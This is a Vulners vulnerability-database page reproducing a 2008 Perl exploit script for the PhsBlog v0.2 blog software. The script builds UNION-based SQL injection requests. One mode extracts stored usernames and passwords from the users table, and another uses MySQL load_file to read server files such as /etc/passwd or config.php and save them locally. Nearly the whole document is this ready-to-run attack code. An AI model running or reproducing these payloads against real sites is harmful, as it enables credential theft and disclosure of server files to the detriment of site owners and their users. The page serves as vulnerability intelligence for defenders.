Vulners
Lucene search
phsBlog 0.2 Bypass SQL Injection Filtering Exploit
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip
#
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#----------------------------------------------------------------
use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname="PhsBlog v0.2";
sub header
{
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find Script username and password *
* Mod 2 : File Disclosure(not work in many servers)*
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1